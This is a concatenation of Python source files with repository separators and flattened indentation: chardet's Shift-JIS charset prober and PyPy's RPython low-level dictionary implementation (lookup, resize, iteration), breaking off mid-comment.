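# Illustrative usage sketch (added for exposition, not part of the original module;
# shown as comments because the module relies on package-relative imports). The sample
# expressions and context values are assumptions chosen for demonstration.
#
#     const_eval("[1, 2, (3, 4), {'foo': 'bar'}]")      # literals only
#     expr_eval("2 * (3 + 4)")                           # literals + arithmetic
#     safe_eval("[('state', '=', 'done')]")              # domain-like literal
#     safe_eval("qty * price", {'qty': 3, 'price': 2.5}) # names from a copied context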
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
stutivarshney/Bal-Aveksha
|
refs/heads/master
|
WebServer/BalAvekshaEnv/lib/python3.5/site-packages/pip/_vendor/requests/packages/chardet/sjisprober.py
|
1776
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import SJISDistributionAnalysis
from .jpcntx import SJISContextAnalysis
from .mbcssm import SJISSMModel
from . import constants
class SJISProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(SJISSMModel)
self._mDistributionAnalyzer = SJISDistributionAnalysis()
self._mContextAnalyzer = SJISContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return self._mContextAnalyzer.get_charset_name()
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:],
charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3
- charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
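# Illustrative usage sketch (added for exposition, not part of the original module;
# shown as comments because the module uses package-relative imports). A prober is
# fed raw bytes and then queried for its verdict; the sample text is an assumption.
#
#     prober = SJISProber()
#     prober.feed(u'\u65e5\u672c\u8a9e'.encode('shift_jis'))
#     prober.get_charset_name()   # expected to report a Shift-JIS family charset
#     prober.get_confidence()     # float in [0, 1]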
|
jptomo/rpython-lang-scheme
|
refs/heads/master
|
rpython/rtyper/lltypesystem/rdict.py
|
1
|
from rpython.tool.pairtype import pairtype
from rpython.flowspace.model import Constant
from rpython.rtyper.rdict import AbstractDictRepr, AbstractDictIteratorRepr
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
from rpython.rlib import objectmodel, jit
from rpython.rlib.debug import ll_assert
from rpython.rlib.rarithmetic import r_uint, intmask, LONG_BIT
from rpython.rtyper import rmodel
from rpython.rtyper.error import TyperError
HIGHEST_BIT = r_uint(intmask(1 << (LONG_BIT - 1)))
MASK = r_uint(intmask(HIGHEST_BIT - 1))
# ____________________________________________________________
#
# generic implementation of RPython dictionary, with parametric DICTKEY and
# DICTVALUE types.
#
# XXX for immutable dicts, the array should be inlined and
# resize_counter and everused are not needed.
#
# struct dictentry {
# DICTKEY key;
# bool f_valid; # (optional) the entry is filled
# bool f_everused; # (optional) the entry is or has ever been filled
# DICTVALUE value;
# int f_hash; # (optional) key hash, if hard to recompute
# }
#
# struct dicttable {
# int num_items;
# int resize_counter;
# Array *entries;
# (Function DICTKEY, DICTKEY -> bool) *fnkeyeq;
# (Function DICTKEY -> int) *fnkeyhash;
# }
#
#
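#
# Illustrative RPython-level sketch (added for exposition; the key class and field
# names are assumptions): a custom eq/hash pair is what ends up in the fnkeyeq and
# fnkeyhash slots described above.
#
#     from rpython.rlib.objectmodel import r_dict
#
#     def eq_key(k1, k2):
#         return k1.ident == k2.ident
#
#     def hash_key(k):
#         return k.ident
#
#     d = r_dict(eq_key, hash_key)   # rtyped as a DictRepr with custom_eq_hash set
#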
class DictRepr(AbstractDictRepr):
def __init__(self, rtyper, key_repr, value_repr, dictkey, dictvalue,
custom_eq_hash=None, force_non_null=False):
self.rtyper = rtyper
self.DICT = lltype.GcForwardReference()
self.lowleveltype = lltype.Ptr(self.DICT)
self.custom_eq_hash = custom_eq_hash is not None
if not isinstance(key_repr, rmodel.Repr): # not computed yet, done by setup()
assert callable(key_repr)
self._key_repr_computer = key_repr
else:
self.external_key_repr, self.key_repr = self.pickkeyrepr(key_repr)
if not isinstance(value_repr, rmodel.Repr): # not computed yet, done by setup()
assert callable(value_repr)
self._value_repr_computer = value_repr
else:
self.external_value_repr, self.value_repr = self.pickrepr(value_repr)
self.dictkey = dictkey
self.dictvalue = dictvalue
self.dict_cache = {}
self._custom_eq_hash_repr = custom_eq_hash
self.force_non_null = force_non_null
# setup() needs to be called to finish this initialization
def _externalvsinternal(self, rtyper, item_repr):
return rmodel.externalvsinternal(self.rtyper, item_repr)
def _setup_repr(self):
if 'key_repr' not in self.__dict__:
key_repr = self._key_repr_computer()
self.external_key_repr, self.key_repr = self.pickkeyrepr(key_repr)
if 'value_repr' not in self.__dict__:
self.external_value_repr, self.value_repr = self.pickrepr(self._value_repr_computer())
if isinstance(self.DICT, lltype.GcForwardReference):
self.DICTKEY = self.key_repr.lowleveltype
self.DICTVALUE = self.value_repr.lowleveltype
# compute the shape of the DICTENTRY structure
entryfields = []
entrymeths = {
'allocate': lltype.typeMethod(_ll_malloc_entries),
'delete': _ll_free_entries,
'must_clear_key': (isinstance(self.DICTKEY, lltype.Ptr)
and self.DICTKEY._needsgc()),
'must_clear_value': (isinstance(self.DICTVALUE, lltype.Ptr)
and self.DICTVALUE._needsgc()),
}
# * the key
entryfields.append(("key", self.DICTKEY))
# * if NULL is not a valid ll value for the key or the value
# field of the entry, it can be used as a marker for
# never-used entries. Otherwise, we need an explicit flag.
s_key = self.dictkey.s_value
s_value = self.dictvalue.s_value
nullkeymarker = not self.key_repr.can_ll_be_null(s_key)
nullvaluemarker = not self.value_repr.can_ll_be_null(s_value)
if self.force_non_null:
if not nullkeymarker:
rmodel.warning("%s can be null, but forcing non-null in dict key" % s_key)
nullkeymarker = True
if not nullvaluemarker:
rmodel.warning("%s can be null, but forcing non-null in dict value" % s_value)
nullvaluemarker = True
dummykeyobj = self.key_repr.get_ll_dummyval_obj(self.rtyper,
s_key)
dummyvalueobj = self.value_repr.get_ll_dummyval_obj(self.rtyper,
s_value)
# * the state of the entry - trying to encode it as dummy objects
if nullkeymarker and dummykeyobj:
# all the state can be encoded in the key
entrymeths['everused'] = ll_everused_from_key
entrymeths['dummy_obj'] = dummykeyobj
entrymeths['valid'] = ll_valid_from_key
entrymeths['mark_deleted'] = ll_mark_deleted_in_key
# the key is overwritten by 'dummy' when the entry is deleted
entrymeths['must_clear_key'] = False
elif nullvaluemarker and dummyvalueobj:
# all the state can be encoded in the value
entrymeths['everused'] = ll_everused_from_value
entrymeths['dummy_obj'] = dummyvalueobj
entrymeths['valid'] = ll_valid_from_value
entrymeths['mark_deleted'] = ll_mark_deleted_in_value
# value is overwritten by 'dummy' when entry is deleted
entrymeths['must_clear_value'] = False
else:
# we need a flag to know if the entry was ever used
# (we cannot use a NULL as a marker for this, because
# the key and value will be reset to NULL to clear their
# reference)
entryfields.append(("f_everused", lltype.Bool))
entrymeths['everused'] = ll_everused_from_flag
# can we still rely on a dummy obj to mark deleted entries?
if dummykeyobj:
entrymeths['dummy_obj'] = dummykeyobj
entrymeths['valid'] = ll_valid_from_key
entrymeths['mark_deleted'] = ll_mark_deleted_in_key
# key is overwritten by 'dummy' when entry is deleted
entrymeths['must_clear_key'] = False
elif dummyvalueobj:
entrymeths['dummy_obj'] = dummyvalueobj
entrymeths['valid'] = ll_valid_from_value
entrymeths['mark_deleted'] = ll_mark_deleted_in_value
# value is overwritten by 'dummy' when entry is deleted
entrymeths['must_clear_value'] = False
else:
entryfields.append(("f_valid", lltype.Bool))
entrymeths['valid'] = ll_valid_from_flag
entrymeths['mark_deleted'] = ll_mark_deleted_in_flag
# * the value
entryfields.append(("value", self.DICTVALUE))
# * the hash, if needed
if self.custom_eq_hash:
fasthashfn = None
else:
fasthashfn = self.key_repr.get_ll_fasthash_function()
if getattr(self.key_repr.get_ll_eq_function(),
'no_direct_compare', False):
entrymeths['no_direct_compare'] = True
if fasthashfn is None:
entryfields.append(("f_hash", lltype.Signed))
entrymeths['hash'] = ll_hash_from_cache
else:
entrymeths['hash'] = ll_hash_recomputed
entrymeths['fasthashfn'] = fasthashfn
# Build the lltype data structures
self.DICTENTRY = lltype.Struct("dictentry", *entryfields)
self.DICTENTRYARRAY = lltype.GcArray(self.DICTENTRY,
adtmeths=entrymeths)
fields = [ ("num_items", lltype.Signed),
("resize_counter", lltype.Signed),
("entries", lltype.Ptr(self.DICTENTRYARRAY)) ]
if self.custom_eq_hash:
self.r_rdict_eqfn, self.r_rdict_hashfn = self._custom_eq_hash_repr()
fields.extend([ ("fnkeyeq", self.r_rdict_eqfn.lowleveltype),
("fnkeyhash", self.r_rdict_hashfn.lowleveltype) ])
adtmeths = {
'keyhash': ll_keyhash_custom,
'keyeq': ll_keyeq_custom,
'r_rdict_eqfn': self.r_rdict_eqfn,
'r_rdict_hashfn': self.r_rdict_hashfn,
'paranoia': True,
}
else:
# figure out which functions must be used to hash and compare
ll_keyhash = self.key_repr.get_ll_hash_function()
ll_keyeq = self.key_repr.get_ll_eq_function() # can be None
ll_keyhash = lltype.staticAdtMethod(ll_keyhash)
if ll_keyeq is not None:
ll_keyeq = lltype.staticAdtMethod(ll_keyeq)
adtmeths = {
'keyhash': ll_keyhash,
'keyeq': ll_keyeq,
'paranoia': False,
}
adtmeths['KEY'] = self.DICTKEY
adtmeths['VALUE'] = self.DICTVALUE
adtmeths['allocate'] = lltype.typeMethod(_ll_malloc_dict)
self.DICT.become(lltype.GcStruct("dicttable", adtmeths=adtmeths,
*fields))
def convert_const(self, dictobj):
from rpython.rtyper.lltypesystem import llmemory
# get object from bound dict methods
#dictobj = getattr(dictobj, '__self__', dictobj)
if dictobj is None:
return lltype.nullptr(self.DICT)
if not isinstance(dictobj, (dict, objectmodel.r_dict)):
raise TypeError("expected a dict: %r" % (dictobj,))
try:
key = Constant(dictobj)
return self.dict_cache[key]
except KeyError:
self.setup()
l_dict = ll_newdict_size(self.DICT, len(dictobj))
self.dict_cache[key] = l_dict
r_key = self.key_repr
if r_key.lowleveltype == llmemory.Address:
raise TypeError("No prebuilt dicts of address keys")
r_value = self.value_repr
if isinstance(dictobj, objectmodel.r_dict):
if self.r_rdict_eqfn.lowleveltype != lltype.Void:
l_fn = self.r_rdict_eqfn.convert_const(dictobj.key_eq)
l_dict.fnkeyeq = l_fn
if self.r_rdict_hashfn.lowleveltype != lltype.Void:
l_fn = self.r_rdict_hashfn.convert_const(dictobj.key_hash)
l_dict.fnkeyhash = l_fn
for dictkeycontainer, dictvalue in dictobj._dict.items():
llkey = r_key.convert_const(dictkeycontainer.key)
llvalue = r_value.convert_const(dictvalue)
ll_dict_insertclean(l_dict, llkey, llvalue,
dictkeycontainer.hash)
return l_dict
else:
for dictkey, dictvalue in dictobj.items():
llkey = r_key.convert_const(dictkey)
llvalue = r_value.convert_const(dictvalue)
ll_dict_insertclean(l_dict, llkey, llvalue,
l_dict.keyhash(llkey))
return l_dict
def rtype_len(self, hop):
v_dict, = hop.inputargs(self)
return hop.gendirectcall(ll_dict_len, v_dict)
def rtype_bool(self, hop):
v_dict, = hop.inputargs(self)
return hop.gendirectcall(ll_dict_bool, v_dict)
def make_iterator_repr(self, *variant):
return DictIteratorRepr(self, *variant)
def rtype_method_get(self, hop):
v_dict, v_key, v_default = hop.inputargs(self, self.key_repr,
self.value_repr)
hop.exception_cannot_occur()
v_res = hop.gendirectcall(ll_get, v_dict, v_key, v_default)
return self.recast_value(hop.llops, v_res)
def rtype_method_setdefault(self, hop):
v_dict, v_key, v_default = hop.inputargs(self, self.key_repr,
self.value_repr)
hop.exception_cannot_occur()
v_res = hop.gendirectcall(ll_setdefault, v_dict, v_key, v_default)
return self.recast_value(hop.llops, v_res)
def rtype_method_copy(self, hop):
v_dict, = hop.inputargs(self)
hop.exception_cannot_occur()
return hop.gendirectcall(ll_copy, v_dict)
def rtype_method_update(self, hop):
v_dic1, v_dic2 = hop.inputargs(self, self)
hop.exception_cannot_occur()
return hop.gendirectcall(ll_update, v_dic1, v_dic2)
def rtype_method__prepare_dict_update(self, hop):
v_dict, v_num = hop.inputargs(self, lltype.Signed)
hop.exception_cannot_occur()
hop.gendirectcall(ll_prepare_dict_update, v_dict, v_num)
def _rtype_method_kvi(self, hop, ll_func):
v_dic, = hop.inputargs(self)
r_list = hop.r_result
cLIST = hop.inputconst(lltype.Void, r_list.lowleveltype.TO)
hop.exception_cannot_occur()
return hop.gendirectcall(ll_func, cLIST, v_dic)
def rtype_method_keys(self, hop):
return self._rtype_method_kvi(hop, ll_dict_keys)
def rtype_method_values(self, hop):
return self._rtype_method_kvi(hop, ll_dict_values)
def rtype_method_items(self, hop):
return self._rtype_method_kvi(hop, ll_dict_items)
def rtype_bltn_list(self, hop):
return self._rtype_method_kvi(hop, ll_dict_keys)
def rtype_method_iterkeys(self, hop):
hop.exception_cannot_occur()
return DictIteratorRepr(self, "keys").newiter(hop)
def rtype_method_itervalues(self, hop):
hop.exception_cannot_occur()
return DictIteratorRepr(self, "values").newiter(hop)
def rtype_method_iteritems(self, hop):
hop.exception_cannot_occur()
return DictIteratorRepr(self, "items").newiter(hop)
def rtype_method_clear(self, hop):
v_dict, = hop.inputargs(self)
hop.exception_cannot_occur()
return hop.gendirectcall(ll_clear, v_dict)
def rtype_method_popitem(self, hop):
v_dict, = hop.inputargs(self)
r_tuple = hop.r_result
cTUPLE = hop.inputconst(lltype.Void, r_tuple.lowleveltype)
hop.exception_is_here()
return hop.gendirectcall(ll_popitem, cTUPLE, v_dict)
def rtype_method_pop(self, hop):
if hop.nb_args == 2:
v_args = hop.inputargs(self, self.key_repr)
target = ll_pop
elif hop.nb_args == 3:
v_args = hop.inputargs(self, self.key_repr, self.value_repr)
target = ll_pop_default
hop.exception_is_here()
v_res = hop.gendirectcall(target, *v_args)
return self.recast_value(hop.llops, v_res)
class __extend__(pairtype(DictRepr, rmodel.Repr)):
def rtype_getitem((r_dict, r_key), hop):
v_dict, v_key = hop.inputargs(r_dict, r_dict.key_repr)
if not r_dict.custom_eq_hash:
hop.has_implicit_exception(KeyError) # record that we know about it
hop.exception_is_here()
v_res = hop.gendirectcall(ll_dict_getitem, v_dict, v_key)
return r_dict.recast_value(hop.llops, v_res)
def rtype_delitem((r_dict, r_key), hop):
v_dict, v_key = hop.inputargs(r_dict, r_dict.key_repr)
if not r_dict.custom_eq_hash:
hop.has_implicit_exception(KeyError) # record that we know about it
hop.exception_is_here()
return hop.gendirectcall(ll_dict_delitem, v_dict, v_key)
def rtype_setitem((r_dict, r_key), hop):
v_dict, v_key, v_value = hop.inputargs(r_dict, r_dict.key_repr, r_dict.value_repr)
if r_dict.custom_eq_hash:
hop.exception_is_here()
else:
hop.exception_cannot_occur()
hop.gendirectcall(ll_dict_setitem, v_dict, v_key, v_value)
def rtype_contains((r_dict, r_key), hop):
v_dict, v_key = hop.inputargs(r_dict, r_dict.key_repr)
hop.exception_is_here()
return hop.gendirectcall(ll_contains, v_dict, v_key)
class __extend__(pairtype(DictRepr, DictRepr)):
def convert_from_to((r_dict1, r_dict2), v, llops):
# check that we don't convert from Dicts with
# different key/value types
if r_dict1.dictkey is None or r_dict2.dictkey is None:
return NotImplemented
if r_dict1.dictkey is not r_dict2.dictkey:
return NotImplemented
if r_dict1.dictvalue is None or r_dict2.dictvalue is None:
return NotImplemented
if r_dict1.dictvalue is not r_dict2.dictvalue:
return NotImplemented
return v
# ____________________________________________________________
#
# Low-level methods. These can be run for testing, but are meant to
# be direct_call'ed from rtyped flow graphs, which means that they will
# get flowed and annotated, mostly with SomePtr.
def ll_everused_from_flag(entries, i):
return entries[i].f_everused
def ll_everused_from_key(entries, i):
return bool(entries[i].key)
def ll_everused_from_value(entries, i):
return bool(entries[i].value)
def ll_valid_from_flag(entries, i):
return entries[i].f_valid
def ll_mark_deleted_in_flag(entries, i):
entries[i].f_valid = False
def ll_valid_from_key(entries, i):
ENTRIES = lltype.typeOf(entries).TO
dummy = ENTRIES.dummy_obj.ll_dummy_value
return entries.everused(i) and entries[i].key != dummy
def ll_mark_deleted_in_key(entries, i):
ENTRIES = lltype.typeOf(entries).TO
dummy = ENTRIES.dummy_obj.ll_dummy_value
entries[i].key = dummy
def ll_valid_from_value(entries, i):
ENTRIES = lltype.typeOf(entries).TO
dummy = ENTRIES.dummy_obj.ll_dummy_value
return entries.everused(i) and entries[i].value != dummy
def ll_mark_deleted_in_value(entries, i):
ENTRIES = lltype.typeOf(entries).TO
dummy = ENTRIES.dummy_obj.ll_dummy_value
entries[i].value = dummy
def ll_hash_from_cache(entries, i):
return entries[i].f_hash
def ll_hash_recomputed(entries, i):
ENTRIES = lltype.typeOf(entries).TO
return ENTRIES.fasthashfn(entries[i].key)
def ll_get_value(d, i):
return d.entries[i].value
def ll_keyhash_custom(d, key):
DICT = lltype.typeOf(d).TO
return objectmodel.hlinvoke(DICT.r_rdict_hashfn, d.fnkeyhash, key)
def ll_keyeq_custom(d, key1, key2):
DICT = lltype.typeOf(d).TO
return objectmodel.hlinvoke(DICT.r_rdict_eqfn, d.fnkeyeq, key1, key2)
def ll_dict_len(d):
return d.num_items
def ll_dict_bool(d):
# check if a dict is True, allowing for None
return bool(d) and d.num_items != 0
def ll_dict_getitem(d, key):
i = ll_dict_lookup(d, key, d.keyhash(key))
if not i & HIGHEST_BIT:
return ll_get_value(d, i)
else:
raise KeyError
def ll_dict_setitem(d, key, value):
hash = d.keyhash(key)
i = ll_dict_lookup(d, key, hash)
return _ll_dict_setitem_lookup_done(d, key, value, hash, i)
# It may be safe to always look inside; it has a few branches, though, and their
# frequencies need to be investigated.
@jit.look_inside_iff(lambda d, key, value, hash, i: jit.isvirtual(d) and jit.isconstant(key))
def _ll_dict_setitem_lookup_done(d, key, value, hash, i):
valid = (i & HIGHEST_BIT) == 0
i = i & MASK
ENTRY = lltype.typeOf(d.entries).TO.OF
entry = d.entries[i]
if not d.entries.everused(i):
# a new entry that was never used before
ll_assert(not valid, "valid but not everused")
rc = d.resize_counter - 3
if rc <= 0: # if needed, resize the dict -- before the insertion
ll_dict_resize(d)
i = ll_dict_lookup_clean(d, hash) # then redo the lookup for 'key'
entry = d.entries[i]
rc = d.resize_counter - 3
ll_assert(rc > 0, "ll_dict_resize failed?")
d.resize_counter = rc
if hasattr(ENTRY, 'f_everused'): entry.f_everused = True
entry.value = value
else:
# override an existing or deleted entry
entry.value = value
if valid:
return
entry.key = key
if hasattr(ENTRY, 'f_hash'): entry.f_hash = hash
if hasattr(ENTRY, 'f_valid'): entry.f_valid = True
d.num_items += 1
def ll_dict_insertclean(d, key, value, hash):
# Internal routine used by ll_dict_resize() to insert an item which is
# known to be absent from the dict. This routine also assumes that
# the dict contains no deleted entries. This routine has the advantage
# of never calling d.keyhash() and d.keyeq(), so it cannot call back
# to user code. ll_dict_insertclean() doesn't resize the dict, either.
i = ll_dict_lookup_clean(d, hash)
ENTRY = lltype.typeOf(d.entries).TO.OF
entry = d.entries[i]
entry.value = value
entry.key = key
if hasattr(ENTRY, 'f_hash'): entry.f_hash = hash
if hasattr(ENTRY, 'f_valid'): entry.f_valid = True
if hasattr(ENTRY, 'f_everused'): entry.f_everused = True
d.num_items += 1
d.resize_counter -= 3
def ll_dict_delitem(d, key):
i = ll_dict_lookup(d, key, d.keyhash(key))
if i & HIGHEST_BIT:
raise KeyError
_ll_dict_del(d, i)
@jit.look_inside_iff(lambda d, i: jit.isvirtual(d) and jit.isconstant(i))
def _ll_dict_del(d, i):
d.entries.mark_deleted(i)
d.num_items -= 1
# clear the key and the value if they are GC pointers
ENTRIES = lltype.typeOf(d.entries).TO
ENTRY = ENTRIES.OF
entry = d.entries[i]
if ENTRIES.must_clear_key:
entry.key = lltype.nullptr(ENTRY.key.TO)
if ENTRIES.must_clear_value:
entry.value = lltype.nullptr(ENTRY.value.TO)
#
# The rest is commented out: like CPython we no longer shrink the
# dictionary here. It may shrink later if we try to append a number
# of new items to it. Unsure if this behavior was designed in
# CPython or is accidental. A design reason would be that if you
# delete all items in a dictionary (e.g. with a series of
# popitem()), then CPython avoids shrinking the table several times.
#num_entries = len(d.entries)
#if num_entries > DICT_INITSIZE and d.num_items <= num_entries / 4:
# ll_dict_resize(d)
# A previous xxx: move the size checking and resize into a single
# call which is opaque to the JIT when the dict isn't virtual, to
# avoid extra branches.
def ll_dict_resize(d):
# make a 'new_size' estimate and shrink it if there are many
# deleted entry markers. See CPython for why it is a good idea to
# quadruple the dictionary size as long as it's not too big.
# (Quadrupling comes from '(d.num_items + d.num_items + 1) * 2'
# as long as num_items is not too large.)
num_extra = min(d.num_items + 1, 30000)
_ll_dict_resize_to(d, num_extra)
ll_dict_resize.oopspec = 'dict.resize(d)'
def _ll_dict_resize_to(d, num_extra):
new_estimate = (d.num_items + num_extra) * 2
new_size = DICT_INITSIZE
while new_size <= new_estimate:
new_size *= 2
old_entries = d.entries
old_size = len(d.entries)
d.entries = lltype.typeOf(old_entries).TO.allocate(new_size)
d.num_items = 0
d.resize_counter = new_size * 2
i = 0
while i < old_size:
if old_entries.valid(i):
hash = old_entries.hash(i)
entry = old_entries[i]
ll_dict_insertclean(d, entry.key, entry.value, hash)
i += 1
old_entries.delete()
# ------- a port of CPython's dictobject.c's lookdict implementation -------
PERTURB_SHIFT = 5
@jit.look_inside_iff(lambda d, key, hash: jit.isvirtual(d) and jit.isconstant(key))
@jit.oopspec('dict.lookup(d, key, hash)')
def ll_dict_lookup(d, key, hash):
entries = d.entries
ENTRIES = lltype.typeOf(entries).TO
direct_compare = not hasattr(ENTRIES, 'no_direct_compare')
mask = len(entries) - 1
i = r_uint(hash & mask)
# do the first try before any looping
if entries.valid(i):
checkingkey = entries[i].key
if direct_compare and checkingkey == key:
return i # found the entry
if d.keyeq is not None and entries.hash(i) == hash:
# correct hash, maybe the key is e.g. a different pointer to
# an equal object
found = d.keyeq(checkingkey, key)
if d.paranoia:
if (entries != d.entries or
not entries.valid(i) or entries[i].key != checkingkey):
# the compare did major nasty stuff to the dict: start over
return ll_dict_lookup(d, key, hash)
if found:
return i # found the entry
freeslot = -1
elif entries.everused(i):
freeslot = intmask(i)
else:
return i | HIGHEST_BIT # pristine entry -- lookup failed
# In the loop, a deleted entry (everused and not valid) is by far
# (factor of 100s) the least likely outcome, so test for that last.
perturb = r_uint(hash)
while 1:
# compute the next index using unsigned arithmetic
i = (i << 2) + i + perturb + 1
i = i & mask
# keep 'i' as a signed number here, to consistently pass signed
# arguments to the small helper methods.
if not entries.everused(i):
if freeslot == -1:
freeslot = intmask(i)
return r_uint(freeslot) | HIGHEST_BIT
elif entries.valid(i):
checkingkey = entries[i].key
if direct_compare and checkingkey == key:
return i
if d.keyeq is not None and entries.hash(i) == hash:
# correct hash, maybe the key is e.g. a different pointer to
# an equal object
found = d.keyeq(checkingkey, key)
if d.paranoia:
if (entries != d.entries or
not entries.valid(i) or entries[i].key != checkingkey):
# the compare did major nasty stuff to the dict:
# start over
return ll_dict_lookup(d, key, hash)
if found:
return i # found the entry
elif freeslot == -1:
freeslot = intmask(i)
perturb >>= PERTURB_SHIFT
def ll_dict_lookup_clean(d, hash):
# a simplified version of ll_dict_lookup() which assumes that the
# key is new, and the dictionary doesn't contain deleted entries.
# It only finds the next free slot for the given hash.
entries = d.entries
mask = len(entries) - 1
i = r_uint(hash & mask)
perturb = r_uint(hash)
while entries.everused(i):
i = (i << 2) + i + perturb + 1
i = i & mask
perturb >>= PERTURB_SHIFT
return i
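# Illustrative sketch (added for exposition, never called by the rtyper): the probe
# sequence generated by the recurrence used in the two lookup functions above,
# written as plain Python; the sample arguments are assumptions.
#
#     def probe_sequence(hash, mask, steps=8):
#         i = hash & mask
#         perturb = hash
#         seq = [i]
#         for _ in range(steps):
#             i = ((i << 2) + i + perturb + 1) & mask
#             perturb >>= PERTURB_SHIFT
#             seq.append(i)
#         return seq    # e.g. probe_sequence(0x1234, 7) walks an 8-slot table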
# ____________________________________________________________
#
# Irregular operations.
DICT_INITSIZE = 8
def ll_newdict(DICT):
d = DICT.allocate()
d.entries = DICT.entries.TO.allocate(DICT_INITSIZE)
d.num_items = 0
d.resize_counter = DICT_INITSIZE * 2
return d
DictRepr.ll_newdict = staticmethod(ll_newdict)
def ll_newdict_size(DICT, length_estimate):
length_estimate = (length_estimate // 2) * 3
n = DICT_INITSIZE
while n < length_estimate:
n *= 2
d = DICT.allocate()
d.entries = DICT.entries.TO.allocate(n)
d.num_items = 0
d.resize_counter = n * 2
return d
# rpython.memory.lldict uses a dict based on Struct and Array
# instead of GcStruct and GcArray, which is done by using different
# 'allocate' and 'delete' adtmethod implementations than the ones below
def _ll_malloc_dict(DICT):
return lltype.malloc(DICT)
def _ll_malloc_entries(ENTRIES, n):
return lltype.malloc(ENTRIES, n, zero=True)
def _ll_free_entries(entries):
pass
# ____________________________________________________________
#
# Iteration.
class DictIteratorRepr(AbstractDictIteratorRepr):
def __init__(self, r_dict, variant="keys"):
self.r_dict = r_dict
self.variant = variant
self.lowleveltype = lltype.Ptr(lltype.GcStruct('dictiter',
('dict', r_dict.lowleveltype),
('index', lltype.Signed)))
self.ll_dictiter = ll_dictiter
self._ll_dictnext = _ll_dictnext
def ll_dictiter(ITERPTR, d):
iter = lltype.malloc(ITERPTR.TO)
iter.dict = d
iter.index = 0
return iter
@jit.look_inside_iff(lambda iter: jit.isvirtual(iter)
and (iter.dict is None or
jit.isvirtual(iter.dict)))
@jit.oopspec("dictiter.next(iter)")
def _ll_dictnext(iter):
dict = iter.dict
if dict:
entries = dict.entries
index = iter.index
assert index >= 0
entries_len = len(entries)
while index < entries_len:
nextindex = index + 1
if entries.valid(index):
iter.index = nextindex
return index
index = nextindex
# clear the reference to the dict and prevent restarts
iter.dict = lltype.nullptr(lltype.typeOf(iter).TO.dict.TO)
raise StopIteration
# _____________________________________________________________
# methods
def ll_get(dict, key, default):
i = ll_dict_lookup(dict, key, dict.keyhash(key))
if not i & HIGHEST_BIT:
return ll_get_value(dict, i)
else:
return default
def ll_setdefault(dict, key, default):
hash = dict.keyhash(key)
i = ll_dict_lookup(dict, key, hash)
if not i & HIGHEST_BIT:
return ll_get_value(dict, i)
else:
_ll_dict_setitem_lookup_done(dict, key, default, hash, i)
return default
def ll_copy(dict):
DICT = lltype.typeOf(dict).TO
dictsize = len(dict.entries)
d = DICT.allocate()
d.entries = DICT.entries.TO.allocate(dictsize)
d.num_items = dict.num_items
d.resize_counter = dict.resize_counter
if hasattr(DICT, 'fnkeyeq'): d.fnkeyeq = dict.fnkeyeq
if hasattr(DICT, 'fnkeyhash'): d.fnkeyhash = dict.fnkeyhash
i = 0
while i < dictsize:
d_entry = d.entries[i]
entry = dict.entries[i]
ENTRY = lltype.typeOf(d.entries).TO.OF
d_entry.key = entry.key
if hasattr(ENTRY, 'f_valid'): d_entry.f_valid = entry.f_valid
if hasattr(ENTRY, 'f_everused'): d_entry.f_everused = entry.f_everused
d_entry.value = entry.value
if hasattr(ENTRY, 'f_hash'): d_entry.f_hash = entry.f_hash
i += 1
return d
ll_copy.oopspec = 'dict.copy(dict)'
def ll_clear(d):
if (len(d.entries) == DICT_INITSIZE and
d.resize_counter == DICT_INITSIZE * 2):
return
old_entries = d.entries
d.entries = lltype.typeOf(old_entries).TO.allocate(DICT_INITSIZE)
d.num_items = 0
d.resize_counter = DICT_INITSIZE * 2
old_entries.delete()
ll_clear.oopspec = 'dict.clear(d)'
def ll_update(dic1, dic2):
if dic1 == dic2:
return
ll_prepare_dict_update(dic1, dic2.num_items)
entries = dic2.entries
d2len = len(entries)
i = 0
while i < d2len:
if entries.valid(i):
entry = entries[i]
hash = entries.hash(i)
key = entry.key
value = entry.value
j = ll_dict_lookup(dic1, key, hash)
_ll_dict_setitem_lookup_done(dic1, key, value, hash, j)
i += 1
ll_update.oopspec = 'dict.update(dic1, dic2)'
def ll_prepare_dict_update(d, num_extra):
# Prescale 'd' for 'num_extra' items, assuming that most items don't
# collide. If this assumption is false, 'd' becomes too large by at
